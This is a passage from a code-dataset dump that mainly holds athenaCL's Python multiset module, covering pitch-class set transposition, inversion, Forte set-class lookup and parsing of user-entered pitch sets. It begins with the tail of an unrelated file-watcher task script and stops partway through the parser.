validate_database()))\n\n def on_deleted(self, event):\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n loop.run_until_complete(validate_database())\n loop.run_until_complete(asyncio.gather(scan_all_series(), validate_database()))\n\ndef start_watchdog(directory):\n observer = Observer()\n handler = FileChangeHandler()\n observer.schedule(handler, directory, recursive=True)\n observer.start()","repo_name":"alexmichaelkeith/encoderr","sub_path":"src/tasks/periodic.py","file_name":"periodic.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"32647997063","text":"import copy\nimport unittest, doctest\n\n\n# master data tables used for all set data access\nfrom athenaCL.libATH import setTables\nfrom athenaCL.libATH import dialog\nfrom athenaCL.libATH import drawer\nfrom athenaCL.libATH import pitchTools\nfrom athenaCL.libATH import language\nfrom athenaCL.libATH import spectral\nfrom athenaCL.libATH import sieve\nfrom athenaCL.libATH import error\nlang = language.LangObj()\n\nSCDICT = setTables.SCDICT # data for all sets, vectors and docs\nTNMAX = setTables.TNMAX # dictionary\nTNIMAX = setTables.TNIMAX # ref dictionary\nTNREF = setTables.TNREF # ref dcitionary\nSCREF = setTables.SCREF # ref dcitionary\nFORTE = setTables.FORTE # classic forte table\n\n\n_MOD = 'multiset.py'\nfrom athenaCL.libATH import prefTools\nenvironment = prefTools.Environment(_MOD)\n\n\n\n#-----------------------------------------------------------------||||||||||||--\n\n# these function are depreciated here\n# moved to pitchTools.py\n# thes are provided for bkward compat\ntransposer = pitchTools.pcTransposer\npitchSpaceTransposer = pitchTools.psTransposer\n\n#-----------------------------------------------------------------||||||||||||--\n# tools for processing sets\n# these methods are out of date (post 1.2) and should be phased out of usage\n\ndef pcSetTransposer(chord, trans):\n \"\"\"transposes an entire set by trans. w/ mod12\n will strip oct info, retain micro info\n\n >>> pcSetTransposer([3,4,5], 3)\n (6, 7, 8)\n \"\"\"\n newSet = []\n for pc in chord:\n newSet.append(pitchTools.pcTransposer(pc, trans))\n return tuple(newSet)\n \ndef psSetTransposer(chord, trans):\n \"\"\"transposes an entire set by trans, no mod12\n retains oct info, micro info \n\n >>> pcSetTransposer([3,4,5], 14)\n (5, 6, 7)\n \"\"\"\n newSet = []\n for pc in chord: ## works for negative or positive numbers\n newSet.append(pitchTools.psTransposer(pc, trans))\n return tuple(newSet)\n \ndef pcInverter(nrmlSet):\n \"\"\"returns the inversion of a chord (list of pitches in normal form)\n\n >>> pcInverter((0,4,7))\n (0, 3, 7)\n >>> pcInverter((5,6,8))\n (0, 2, 3)\n \"\"\"\n tempSet = []\n invertSet = []\n for pitch in nrmlSet:\n tempSet.append((12 - pitch) % 12)\n tempSet.reverse()\n for pitch in tempSet:\n invertSet.append(transposer(pitch, (12 - tempSet[0])))\n return tuple(invertSet)\n\ndef psInverter(normalChord): \n \"\"\"returns the inversion of a chord (list of pitches in normal form)\n returns inversion with same starting value in pitch space\n must be entered as normal form\n \"\"\" \n modInversiontSet = pcInverter(normalChord)\n \n sourceSetAsOctMultipliers = []\n for entry in normalChord:\n octMultiplier, modPC = pitchTools.splitOctPs(entry)\n # gives original order of oct multipliers fo each member of set\n sourceSetAsOctMultipliers.append(octMultiplier)\n \n modInversiontSet = list(modInversiontSet)\n # do mod 12 transposition\n invertedChord = pcSetTransposer(modInversiontSet, normalChord[0])\n \n invertedChord = list(invertedChord)\n #check octaves\n for i in range(0,len(normalChord)) :\n sourceOct = sourceSetAsOctMultipliers[i]\n currentOct, modPC = pitchTools.splitOctPs(invertedChord[i]) \n if sourceOct == currentOct:\n pass\n else: # find difference and make up\n if sourceOct > currentOct:\n direction = 'up'\n else:\n direction = 'down'\n distance = abs(currentOct - sourceOct)\n if direction == 'up':\n invertedChord[i] = invertedChord[i] + (12 * distance)\n else:\n invertedChord[i] = invertedChord[i] - (12 * distance) \n return tuple(invertedChord)\n\n \n#-----------------------------------------------------------------||||||||||||--\ndef psSetToMason(chord):\n \"\"\"named after a music educator named Mason by Michael Gogins\n convert any pitch space / class set to a 'mason' value\n OR-ing, to be precise, mod 4095 (the total number of unordered\n pitch-class sets in 12TET), not adding. In other words, a bit-field of 12\n bits, one bit per pitch-class.\n \"\"\"\n newSet = []\n for pc in chord:\n pc = pitchTools.pcTransposer(pc, 0) # make mod 12\n if pc not in newSet: # remove redundancies\n newSet.append(pc)\n mason = 0\n for i in newSet:\n mason = mason + pow(2, i)\n return mason % 4095\n\n#-----------------------------------------------------------------||||||||||||--\n# utility to calculate normal form\ndef findNormalT(pcSet, setMatrix=None):\n \"\"\"finds normal form of any pc set and returns forte number\n as a scTriple data structure, and transposition from normal form\n pcSet may contain psReals, and as such, need to be converted to ints\n\n >>> findNormalT([3,4,5])\n ((3, 1, 0), 3)\n\n \"\"\"\n if setMatrix == None: # use forte as default\n setMatrix = FORTE\n MONADscTuple = (1,1,0)\n\n # check for bad data\n if drawer.isStr(pcSet):\n return None # error, no strings supported here\n if drawer.isList(pcSet):\n for psReal in pcSet:# make sure all values are numbers; no strings allowed\n if drawer.isStr(psReal):\n return None # break, return None as error\n # check for unusual data\n if drawer.isNum(pcSet): # its a single number\n pcVal = pitchTools.roundMicro(pcSet)\n # second number is transposition from 0\n return MONADscTuple, (pcVal % 12)\n if len(pcSet) == 1: #filter out monad!\n pcVal = pitchTools.roundMicro(pcSet[0])\n return MONADscTuple, (pcVal % 12)\n\n # scrub and go\n pcSetClone = []\n for psReal in pcSet: # pcSet may contian psReal, w/ floating values\n pcSetClone.append(pitchTools.roundMicro(psReal))\n #check fr non base 12 numbers, negative numbers, redundancies\n pcSetClone = list(pcSetTransposer(pcSetClone, 0))\n pcSetClone.sort()\n\n i = 0\n chord = []\n for i in range(0,12): # remove redundancies\n if i in pcSetClone:\n chord.append(i)\n card = len(chord) \n if card < 1: # monad has already been filtered out\n return None # 2nd no is transposition from 0\n if card == 1: # this is a set like (3,3,3,3)\n return MONADscTuple, (pcSet[0] % 12) \n elif card > 12:\n return None # 'irrational cardinality error'\n\n rotIndices = list(range(0, card))\n foundIndex = None #control variable\n for rot in rotIndices:\n r = rot # dont need to add 1? + 1\n rotSet = chord[r:card] + chord[0:r]\n dif = rotSet[0]\n pSet = pcSetTransposer(rotSet, -dif)\n iSet = tuple(pcInverter(pSet))\n maxRange = len(setMatrix[card])\n # check all sets of given card for match\n for index in range(1, maxRange): # start with 1, not zero\n # this is a default; may be a symmetrical set and have no inversion\n foundInv = 'A' \n # test each set in this cardinality; \"0\" gets pitches\n testSet = tuple(setMatrix[card][index][0]) \n if iSet == testSet:\n foundIndex = index\n foundInv = 'B' #nt sure yet if 1 or 0\n break \n elif pSet == testSet:\n foundIndex = index\n foundInv = 'A' #nt sure yet if 1 or 0 \n break\n if foundIndex != None:\n break\n if foundIndex == None: ## no set found\n return None #'failed!!!'\n \n if foundInv == 'B':\n # has inversion that is non-redundant (variant)\n if setMatrix[card][foundIndex][2][1] == 0 : \n scInv = -1\n else: scInv = 0\n elif foundInv == 'A':\n # has inversion that is non-redundant (variant)\n if setMatrix[card][foundIndex][2][1] == 0 :\n scInv = 1\n else: scInv = 0\n return (card, foundIndex, scInv), dif\n\n\ndef findNormal(pcSet, setMatrix=None):\n \"\"\"same as above but w/o returning transposition\"\"\"\n scTuple, dif = findNormalT(pcSet, setMatrix)\n return scTuple\n\n\n#-----------------------------------------------------------------||||||||||||--\n# conversion utilities\n\ndef forteToSc(card, index, inversion=-2):\n \"\"\"checks for proper inversion and supplies one (A) if not given\n acts as a general filter for all functions calling old forte numbers or\n possible errors: this function will check and suply an alternitive if \n there is an error rather than raising an exception. its used heavily \n and is a source of possible errors\n\n >>> forteToSc(4,3)\n (4, 3, 0)\n \"\"\"\n boundError = 0\n if card > 12 or card < 1:\n boundError = 1\n else: scCard = card #all other cards are good + used\n\n # checks cardinality fr a valid index number\n # supplies index 1 fr a valid card that does nt have\n # a valid index. !!!!!!!!!! should return an error!\n \n if card == 1 or card == 11:\n if index <= 0 or index >2:\n boundError = 1\n else: scIndex = index\n if card == 2 or card == 10:\n if index <= 0 or index >6:\n boundError = 1\n else: scIndex = index\n elif card == 3 or card == 9:\n if index <= 0 or index > 12:\n boundError = 1\n else: scIndex = index\n elif card == 4 or card == 8:\n if index <= 0 or index > 29:\n boundError = 1\n else: scIndex = index\n elif card == 5 or card == 7:\n if index <= 0 or index > 38:\n boundError = 1\n else: scIndex = index\n elif card == 6:\n if index <= 0 or index > 50:\n boundError = 1\n else: scIndex = index\n elif card == 12: ## aggregate!\n if index <= 0 or index > 2:\n boundError = 1\n else: scIndex = index\n\n if boundError:\n environment.printWarn(['boundary error', card, index, inversion])\n return None\n # check fr proper inversion status useing variance vector\n # if_no inv give fr a set, 0 or 1 is suplied, never -1\n # if_no inversion is supplied, acts as if_in Tn/i classification\n \n if inversion <= -2 or inversion >= 2 or inversion == 0:\n if FORTE[scCard][scIndex][2][1] == 0 : \n # has inversion that is non-redundant (variant)\n scInv = 1\n else: scInv = 0\n if inversion == -1:\n if FORTE[scCard][scIndex][2][1] == 0 :\n scInv = -1\n else: scInv = 0\n if inversion == 1:\n if FORTE[scCard][scIndex][2][1] == 0 :\n scInv = 1 \n else: scInv = 0\n\n return scCard, scIndex, scInv\n\ndef tupleToSc(rawForte):\n \"\"\"accepts single tuple as input, then uses forte to sc to \n to supply necessary inversion, if needed.\n \"\"\"\n if rawForte[0] == 1:\n return (1,1,0) \n try:\n inv = rawForte[2]\n except:\n inv = -2 #unknown inversion value: forte to sc will suply\n scTuple = forteToSc(rawForte[0], rawForte[1], inv)\n if scTuple == None:\n raise ValueError\n return scTuple\n\n\ndef scToStr(rawForte):\n \"\"\"raw fortte is a tuple with either 2 or 3 elements, needing to be \n checked\n\n >>> scToStr([4,3])\n '4-3'\n \"\"\"\n if drawer.isInt(rawForte):\n return '1-1' \n elif rawForte[0] == 1:\n return '1-1' \n \n scTuple = tupleToSc(rawForte) \n if len(scTuple) != 3: raise ValueError # should never happen\n \n card = str(scTuple[0])\n indx = str(scTuple[1])\n if scTuple[2] == 0:\n inv = ''\n elif scTuple[2] == 1:\n inv = 'A'\n elif scTuple[2] == -1:\n inv = 'B'\n else: inv = 'error'\n return card + '-' + indx + inv\n \n\n\n# will be depreciated, as now in pitch tools\ndef anySetToPcs(set):\n # set can contain any int, positive or neg\n # input must be a list\n pcsSet = []\n for entry in set:\n modulatedEntry = transposer(entry, 0)\n pcsSet.append(modulatedEntry)\n pcsSet = tuple(pcsSet)\n return pcsSet\n\n\ndef forteToPcs(rawForte): \n \"\"\"\n >>> forteToPcs([6,45])\n (0, 2, 3, 4, 6, 9)\n \"\"\"\n scTuple = tupleToSc(rawForte)\n return SCDICT[scTuple[0]][scTuple[1], scTuple[2]][0]\n\ndef forteToVar(rawForte):\n \"\"\"\n >>> forteToVar([5,3])\n (1, 0, 0, 0, 1, 1, 1, 0)\n \"\"\"\n scTuple = tupleToSc(rawForte)\n return SCDICT[scTuple[0]][scTuple[1], scTuple[2]][1]\n\ndef forteToIcv(rawForte):\n \"\"\"\n >>> forteToIcv([8,3])\n (6, 5, 6, 5, 4, 2)\n \"\"\"\n scTuple = tupleToSc(rawForte)\n return SCDICT[scTuple[0]][scTuple[1], scTuple[2]][2]\n\n\ndef forteToZData(rawForte): \n \"\"\"returns sc tuple of z relation, if it exists\n otherwise, returns none\n >>> forteToZData([6,43])\n (6, 17, 1)\n \"\"\" \n scTuple = tupleToSc(rawForte)\n zVal = FORTE[scTuple[0]][scTuple[1]][3] # gets z relation val\n # z val is index of relative z relation\n if zVal == 0:\n return None\n else:\n # find card complement\n card = scTuple[0]\n return tupleToSc((card, zVal))\n\ndef forteToRefData(rawForte):\n \"\"\"returns dictionary of references from SCdata\"\"\"\n scTuple = tupleToSc(rawForte)\n setRef = SCREF[scTuple]\n if setRef == {} or setRef == None:\n return None\n else:\n return setRef\n\n\ndef getAllScTriples(cardRange='all', tniTog=0):\n \"\"\"gets all scTriples within a variety of ranges\n card range can be specified as string 'all', \n as an int (getting just the values of that int\n or as a range from 1 to 12; if range, last values is inclusif\"\"\"\n if cardRange == 'all':\n gatherCards = list(range(1,13))\n elif drawer.isInt(cardRange):\n gatherCards = [cardRange,] # only get one card\n elif drawer.isList(cardRange):\n if cardRange[1] < cardRange[0]:\n raise ValueError('bad cardinality range given')\n elif cardRange[0] == cardRange[1]:\n gatherCards = [cardRange[0],] # only get one card\n else:\n gatherCards = list(range(cardRange[0], cardRange[1]+1))\n found = []\n for scTriple in list(TNREF.keys()):\n card = scTriple[0]\n inv = scTriple[2]\n if card in gatherCards:\n if tniTog and inv == -1: pass # leave out inversions\n else:\n found.append(scTriple)\n found.sort()\n return found\n\n\ndef _strToSearchList(str):\n \"\"\"removes bad characters, returns a list of words\"\"\"\n str = str.replace('-',' ')\n str = str.replace(',',' ')\n str = str.replace('/',' ')\n str = str.replace('\\ ', ' ')\n strList = str.split() # returns a list\n return strList \n\ndef refData(rawForte):\n \"\"\"returns dictionary of references from SCdata\n\n >>> refData([4,3])\n {'name': ('alternating tetramirror',)}\n \"\"\"\n scTuple = tupleToSc(rawForte)\n setRef = SCREF[scTuple]\n if setRef == {} or setRef == None:\n return None\n else:\n return setRef\n\n\ndef findRef(searchStr, refType='name', setRange='all', tniMode=0):\n \"\"\"\n >>> findRef('Neapolitan pentachord')[0]\n (5, 32, 1)\n >>> findRef('minor-second diminished tetrachord')[0]\n (4, 13, 1)\n \"\"\"\n searchWords = _strToSearchList(searchStr) # returns a list\n scoreDict = {}\n for setTuple in getAllScTriples('all', tniMode):\n refDict = refData(setTuple)\n scoreDict[setTuple] = 0\n if refDict == None:\n continue\n if refType in list(refDict.keys()): # name groups\n nameList = refDict[refType]\n nameWords = []\n for nameStrings in nameList: # list of strings\n nameWords = nameWords + _strToSearchList(nameStrings) \n for sw in searchWords:\n swTemp = sw.lower() # keep case\n for nw in nameWords:\n nwTemp = nw.lower() # keep case\n if nwTemp.find(swTemp) >= 0:\n scoreDict[setTuple] = scoreDict[setTuple] + 1 # add\n rankList = []\n for setTuple in list(scoreDict.keys()):\n if scoreDict[setTuple] == 0:\n del scoreDict[setTuple] # remove if 0 score\n else: # add ranks to a list\n rankList.append((scoreDict[setTuple], setTuple))\n\n rankList.sort()\n rankList.reverse() \n searchResults = []\n for rank, setTuple in rankList: # ordered\n searchResults.append(setTuple)\n if searchResults == []:\n return None\n else:\n return searchResults # list of triples\n\n\n\n#-----------------------------------------------------------------||||||||||||--\nclass Multiset:\n \"\"\"object of a set which may be interpreted as a set\n pcs, ps, or setclass. order and multiplcity may or may not matter\n thus it is called a multiset\n object orientated structure\n \"\"\"\n \n def __init__(self, psRealSrc=None, scTriple=None):\n \"\"\" \n _psRealSrc is stored as original data entered; not transposed or changed\n and should not be read as data\n scTriple stores forte name as data strcuture\n must be update for all changes\n psList is the internal data representation\n\n >>> a = Multiset([5,3,15])\n \"\"\"\n self.forms = ('midi', 'psReal', 'psName', 'pch', 'fq', 'pc', # pitch obj\n 'sc', 'dur', 'normal', 'mason', 'card') \n # sone only found in Multiset\n # it is questionable if the t is still required\n # stores transposition away from normal form, and accumulates other\n # transpositions\n self.tRef = 0\n self.dur = 1 # a value for durational weighting, default\n\n if psRealSrc != None and scTriple != None: # both given\n self._psRealSrc = psRealSrc\n self._scTriple = scTriple\n\n elif psRealSrc != None and scTriple == None: # only ps given\n self._psRealSrc = psRealSrc\n normData = findNormalT(self._psRealSrc)\n if normData == None: # an erro has happend\n #print 'problem w/', _psRealSrc\n raise error.MultisetError # cancel set\n self._scTriple, self.tRef = normData\n\n elif psRealSrc == None and scTriple != None: # only sc given\n self._scTriple = scTriple\n self._psRealSrc = forteToPcs(self._scTriple)\n else: # if both None\n raise error.MultisetError\n \n self._psList = [] # a list of pitch objects\n for value in self._psRealSrc: # must be psReal values\n self._psList.append(pitchTools.Pitch(value, 'psReal'))\n # store cardinality\n # removed as redundant; use get\n # self.card = self._scTriple[0]\n\n #-----------------------------------------------------------------------||--\n # data representation\n def _reprListData(self, listData, outer=1):\n msgList = []\n for data in listData:\n if not drawer.isStr(data):\n msgList.append(str(data))\n else:\n msgList.append(data)\n msg = ','.join(msgList) # should be a list of strings\n if outer:\n return '(%s)' % msg\n else:\n return msg\n\n\n def repr(self, type='psReal', outer=1):\n \"\"\"displays a Multiset; outer determines if paranethesis are incl\n\n >>> a = Multiset([2,7,9])\n >>> a.repr()\n '(2,7,9)'\n >>> a.repr('sc')\n '3-9'\n >>> a.repr('midi')\n '(62,67,69)'\n \"\"\"\n # first look for representations that are lists of other data\n if type in ('psReal', 'psName', 'pc', 'midi', 'pch', 'fq'):\n msgList = []\n for pitch in self._psList:\n str = pitch.repr(type)\n msgList.append(str)\n return self._reprListData(msgList, outer)\n # representations that are single values\n elif type == 'dur': # not really needed\n return '%s' % self.dur\n\n elif type == 'sc':\n # scToStr method should be moved inside this class\n return scToStr(self._scTriple)\n\n elif type == 'normal':\n normalList = forteToPcs(self._scTriple)\n return self._reprListData(normalList, outer)\n\n elif type == 'prime':\n # strip inversion info from scTriple, default gets prime\n normalList = forteToPcs(self._scTriple[0:2])\n return self._reprListData(normalList, outer)\n\n elif type == 'icv':\n return self._reprListData(self.icv())\n\n elif type == 'var':\n return self._reprListData(self.var())\n\n elif type == 'ref': # returns a list of strings\n refDict = self.refData()\n msgLines = []\n if refDict == None:\n return None\n else:\n for key in list(refDict.keys()):\n msgLines.append(', '.join(refDict[key]))\n return msgLines\n \n elif type == 'refNames': # return a str of ref names\n refDict = self.refData()\n if refDict == None:\n return None\n else:\n refDict = self.refData()\n if 'name' in refDict:\n return ', '.join(refDict['name'])\n else:\n return None\n\n elif type == 'tRef':\n return '%s' % self.tRef\n\n else:\n raise ValueError('bad representation format')\n\n def __str__(self):\n \"\"\"default string representation is as 'psReal'\"\"\"\n return self.repr()\n \n #-----------------------------------------------------------------------||--\n # data entry, updating\n def setDur(self, value):\n self.dur = value\n\n def setT(self, value):\n \"\"\"for setting a tRef on load or otherwise\"\"\"\n self.tRef = value\n\n def __setitem__(self, key, value):\n self._psList[key] = value\n self._update()\n\n def __contains__(self, item):\n \"\"\"item to test is a set obj\"\"\"\n if item in self._psList:\n return 1\n else:\n return 0\n\n def __delitem__(self, key):\n # key is in the order position\n del self._psList[key]\n self._update()\n\n def __getitem__(self, key):\n self._update()\n return self._psList[key]\n\n #-----------------------------------------------------------------------||--\n # data access\n def __len__(self):\n return len(self._psList)\n\n def _access(self, name):\n \"\"\"output data in the appropriate format\n does not change internal data representation\n \"\"\"\n if name == 'sc': # not an attribute of pitch objects\n return self._scTriple\n elif name == 'dur': # not an attribute of pitch objects\n return self.dur\n elif name == 'normal': # not an attribute of pitch objects\n return forteToPcs(self._scTriple)\n elif name == 'mason':\n pcList = []\n for pitch in self._psList:\n pcList.append(pitch.get('pc'))\n return psSetToMason(pcList) # returns an int\n elif name == 'card': # get cardinality\n return self._scTriple[0]\n dataList = []\n for pitch in self._psList:\n dataList.append(pitch.get(name))\n return tuple(dataList)\n\n# def __getattr__(self, name):\n# \"\"\"this method of data access should no longer be used\"\"\"\n# if name not in self.forms:\n# #print 'Multiset: invalid request for', name\n# raise AttributeError\n# return self._access(name) # convert to appropriate data and return\n\n def get(self, name):\n if name not in self.forms:\n raise ValueError('bad format requested')\n return self._access(name) # convert to appropriate data and return\n\n # sc analysis measures\n def var(self):\n return forteToVar(self._scTriple)\n def icv(self):\n\n return forteToIcv(self._scTriple)\n\n# def cv(self, n):\n# return self.scObj.cv(self._scTriple, n)\n# def xv(self, n):\n# return self.scObj.xv(self._scTriple, n)\n\n def z(self): # returns none if no data\n return forteToZData(self._scTriple)\n\n def zObj(self):\n \"\"\"return a new set object for the z related set\"\"\"\n if self.z() != None:\n return Multiset(None, self.z())\n else:\n return None\n\n def refData(self):\n return forteToRefData(self._scTriple)\n\n# def superSet(self, setRange='all', tniMode=0):\n# \"\"\"returns raw triples w/ searchResults, valueDict\n# if match is given, looks for scTriple to match, returns truth\n# else returns list of tuples\"\"\"\n# searchResults, valueDict = self.scObj.findSuperSets(self._scTriple, \n# 'all', tniMode)\n# return searchResults, valueDict\n\n# def rawData(self, key):\n# \"\"\"raw data via key\"\"\"\n# return self.scObj.rawSetData(self._scTriple[0], self._scTriple[1],\n# self._scTriple[2], key)\n\n #-----------------------------------------------------------------------||--\n # data transformations\n\n def _update(self):\n \"\"\"update scTriple in the case that pitches have chaned,\n via inversion or replacement\n \"\"\"\n normData = findNormalT(self._access('psReal'))\n if normData == None: # an erro has happend\n environment.printDebug(['_update: problem w/',\n self._access('psReal')])\n raise error.MultisetError\n self._scTriple, self.tRef = normData\n # this was removed as redundant\n #self.card = self._scTriple[0]\n\n def t(self, value):\n \"\"\"transpose each pitch objectin pitch space\n \"\"\"\n for pitch in self._psList:\n pitch.t(value)\n self.tRef = self.tRef + value # update transpositon counter\n\n def tMod(self, value):\n \"\"\"trasnpose w/in modulus, retain octave\"\"\"\n for pitch in self._psList:\n pitch.tMod(value)\n self.tRef = self.tRef + value # update transpositon counter\n\n def i(self, axis=None):\n \"\"\"ps inversions, value is the axis\n value can be used to shift inversion\"\"\"\n if axis == None: # shift around the first note in the series\n axis = self._psList[0].get('psReal')\n for pitch in self._psList:\n pitch.i(axis)\n self._update() # sc may have changed\n\n def iMod(self, axis=0):\n \"\"\"inversions, w/in moduls, retain octave\n axis can be a floating point value like 1.5 for certain inversions\"\"\"\n for pitch in self._psList:\n pitch.iMod(axis)\n self._update() # sc may have changed\n\n def retro(self):\n self._psList.reverse()\n\n def slice(self):\n pass\n \n def rotate(self, newZero):\n \"\"\"rotate multiset\n note: this is a rotation in place; this does not take register\n into account, only pitch order\"\"\"\n if newZero == 0: return \n \n psLen = len(self._psList)\n\n if newZero > 0: # map as positive mod\n newZero = newZero % psLen\n if newZero < 0: # map as negative mod\n newZero = newZero % -psLen\n\n if newZero > 0: # map as positive mod\n self._psList = (self._psList[newZero:psLen] + \n self._psList[0:newZero])\n if newZero < 0: # map as negative mod\n self._psList = (self._psList[psLen+newZero:psLen] + \n self._psList[0:psLen+newZero])\n\n\n def rotateOctave(self, newZero):\n \"\"\"rotate multiset\n assume that new zero is the lowest pitch in the set\n transpose pitches as necessary\n \"\"\"\n if newZero == 0: return \n psLen = len(self._psList)\n if psLen == 0: return\n\n self.rotate(newZero) # do standard rotatioin\n\n # the first pitch should always be the lowest pitch\n if newZero > 0: # map as positive mod\n for i in range(1, psLen): # must be greater than 1\n while self._psList[i].get('psReal') < self._psList[0].get('psReal'):\n self._psList[i].t(12) # transpose up one octave\n # take new first pitch down an octave\n # the first pitch should then always be the lowest pitch\n if newZero < 0: # map as positive mod\n self._psList[0].t(-12)\n for i in range(1, psLen): # must be greater than 1\n # continue to check for pitches below the first pitch\n while self._psList[i].get('psReal') < self._psList[0].get('psReal'):\n self._psList[i].t(12) # transpose up one octave\n\n def spaceOctave(self, shift=1):\n \"\"\"simple method of spacing pitches be increasing or decreasing octaves\n does not take into account existing octave positions\"\"\"\n if shift == 0: return # no change\n for i in range(len(self._psList)):\n # for each pitch in the set, add an additional octave shift\n # for each new pitch, an additional shift unit of octaves is added\n self._psList[i].t(12 * shift * i) # shift may be negatives\n\n\n def copy(self):\n obj = Multiset(self._access('psReal'), self._scTriple)\n obj.dur = copy.deepcopy(self.dur)\n obj.tRef = copy.deepcopy(self.tRef)\n return obj\n\n\n\n\n#-----------------------------------------------------------------||||||||||||--\nclass MultisetFactory:\n \"\"\"object to handle getting a set from a user\n sortif a MultiSet factory, for producing objects\n \"\"\"\n def __init__(self):\n pass\n # scObj provided w/ call\n\n def _parseSetInputType(self, usrStr, termObj):\n \"\"\"determine which set input is being provided by user\n termObj may be None; if not interactive, not allow import\n \"\"\"\n usrStr = drawer.strScrub(usrStr, 'L')\n for char in usrStr:\n if char in ['@','&', '|',]: # removed ,'(',')'\n return 'sieve'\n # if a complete user string, get a file dialog\n if usrStr in ['file', 'import', 'spectrum']:\n if not termObj.interact: return None # cant import w/ not interactive\n return 'import'\n if usrStr.find('.txt') >= 0: # assume its a file path\n return 'txt' # import a spectrum\n if usrStr.find('m') >= 0:\n return 'midi'\n if usrStr.find('hz') >= 0 or usrStr.find('fq') >= 0:\n return 'fq'\n # the first character of a set class must always be a number\n # 10, 11, and 12 should be in this list, but requires two characters\n # there must be a dash (not leading), no comas, no periods, \n if (usrStr[0] in ['1','2','3','4','5','6','7','8','9',] and\n usrStr.find('-') != -1 and usrStr.find(',') == -1 and\n usrStr.find('.') == -1 and usrStr[0] != '-'):\n # no other characters should be in this\n return 'forte'\n else:\n for char in usrStr.lower(): # check if it has characters\n if char in list(pitchTools.REFdiaNameToPc.keys()):\n return 'psName'\n return 'psReal' # assume pset numbers\n\n def _parseForte(self, usrStr):\n \"\"\"decifer a user-entered forte value\"\"\"\n #usrStr = self._scrubUsrStr(usrStr)\n #true if string has dash, no commas, no periods: is forte \n scFound = None\n if usrStr.find('b') != -1:\n inv = -1\n usrStr = usrStr.replace('b', ' ')\n else:\n inv = 1 #this value may not be correct, is checked later on\n usrStr = usrStr.replace('a', ' ')\n usrStr = usrStr.replace('-', ' , ') #replace dash with comma\n try:\n rawForte = eval(usrStr)\n except (NameError, SyntaxError):\n raise error.MultisetError\n if rawForte[0] < 1 or rawForte[0] > 12:\n raise error.MultisetError\n elif rawForte[1] > TNIMAX[rawForte[0]]:\n raise error.MultisetError\n else: # successfil asignment\n scFound = forteToSc(rawForte[0], rawForte[1], inv)\n return scFound\n\n def _parsePsName(self, usrStr):\n \"\"\"convert a list of pitch names to a ps\n middle c == c4 == midi 60 == 0\n \"\"\"\n #usrStr = self._scrubUsrStr(usrStr)\n usrList = drawer.strToListFlat(usrStr, 'L')\n psList = []\n for elem in usrList: # may be int or float\n elem = drawer.strScrub(elem)\n if elem == '': continue\n elif elem[0] not in list(pitchTools.REFdiaNameToPc.keys()):\n continue\n else: # this should never raise an error\n psList.append(pitchTools.psNameToPs(elem))\n return psList\n \n def _parseMidi(self, usrStr):\n \"\"\"conver midi values to psInt values\"\"\"\n usrStr = drawer.strStripAlpha(usrStr)\n usrList = drawer.strToListFlat(usrStr, 'L')\n #usrList = usrStr.split(',')\n psList = []\n for elem in usrList: # may be int or float\n elem = drawer.strToNum(elem.strip(), 'num')\n if elem == None: continue\n else: psList.append(pitchTools.midiToPs(elem))\n return psList\n \n def _parseFq(self, usrStr):\n \"\"\"conver midi values to psInt values\"\"\"\n usrStr = drawer.strStripAlpha(usrStr)\n usrList = drawer.strToListFlat(usrStr, 'L')\n #usrList = usrStr.split(',')\n psList = []\n for elem in usrList: # may be int or float\n elem = drawer.strToNum(elem.strip(), 'num')\n if elem == None: continue\n else: psList.append(pitchTools.fqToPs(elem))\n return psList\n \n def _parsePsReal(self, usrStr):\n \"\"\"process a usr string entered as a list psReals\"\"\"\n usrList = drawer.strToListFlat(usrStr, 'L')\n psList = []\n for elem in usrList: # may be int or float\n elem = drawer.strToNum(elem.strip(), 'num')\n if elem == None: continue\n else: psList.append(elem)\n return psList\n\n def _parseSieve(self, usrStr):\n try:\n sieveObj = sieve.SievePitch(usrStr)\n psSet = sieveObj()\n except (SyntaxError, ValueError, TypeError, \n KeyError, error.PitchSyntaxError):\n raise error.MultisetError\n if psSet == []: # no values in this seive segment\n raise error.MultisetError\n return psSet\n \n def _parseTxt(self, usrStr, count=None):\n \"\"\"convert a text file commulative spectrum\"\"\"\n # usrstr is a file path\n try:\n specObj = spectral.SpectrumData(usrStr)\n psSet = specObj.getPitch('psReal', count)\n except (ValueError, IOError):\n raise error.MultisetError\n if psSet == []: # no values in this seive segment\n raise error.MultisetError\n return psSet\n \n def _getCount(self, termObj):\n \"\"\"get number of pitches to read interactively\"\"\"\n query = 'number of pitches?'\n while 1:\n usrStr = dialog.askStr(query, termObj)\n if usrStr == None: return None\n num = drawer.strToNum(usrStr, 'int')\n if num != None and num != 0: return num\n else:\n dialog.msgOut(('%senter a positive or negative integer.\\n' % \n lang.TAB), termObj) \n \n \n def _makeObj(self, ao=None, read=None):\n \"\"\" returns sc, pcset, trans from 0=C, and inv\n read arg allows non-interactive use: provide data as arg\n can be used to replace calls to getSet\n pass an ao to get references and termObj\n \"\"\"\n if ao != None:\n termObj = ao.termObj\n dlgVisMet = ao.external.getPref('athena', 'dlgVisualMethod')\n fpLastDir = ao.aoInfo['fpLastDir']\n else: # get defaults\n termObj = None\n dlgVisMet = 'txt'\n fpLastDir = ''\n \n attempts = 0\n usrStrType = None # not yet known what format user provided\n while 1:\n if read != None: # method must return result, not interactive\n if attempts > 0: return None # dont run more than once when reading\n usrStr = read # assign to usrStr for parsing\n else:\n usrStr = dialog.askStr(lang.msgSCgetSet, termObj)\n if usrStr == None: return None\n attempts = attempts + 1\n usrStrType = self._parseSetInputType(usrStr, termObj)\n # may get one or the other of these as input values\n scFound = None\n psSet = None\n try:\n if usrStrType == 'forte':\n scFound = self._parseForte(usrStr)\n elif usrStrType == 'psName':\n psSet = self._parsePsName(usrStr)\n elif usrStrType == 'psReal':\n psSet = self._parsePsReal(usrStr)\n elif usrStrType == 'sieve':\n psSet = self._parseSieve(usrStr)\n elif usrStrType == 'midi':\n psSet = self._parseMidi(usrStr)\n elif usrStrType == 'fq':\n psSet = self._parseFq(usrStr)\n elif usrStrType == 'txt':\n psSet = self._parseTxt(usrStr)\n # import will get a file dialog\n elif usrStrType == 'import':\n msg, ok = dialog.promptGetFile(lang.msgSCgetAudacity, \n fpLastDir, 'file', dlgVisMet, termObj)\n count = self._getCount(termObj) # count may be equal to None\n # call parse text after getting file path\n if ok: psSet = self._parseTxt(msg, count)\n else: return None # cancel\n else: return None\n except error.MultisetError:\n 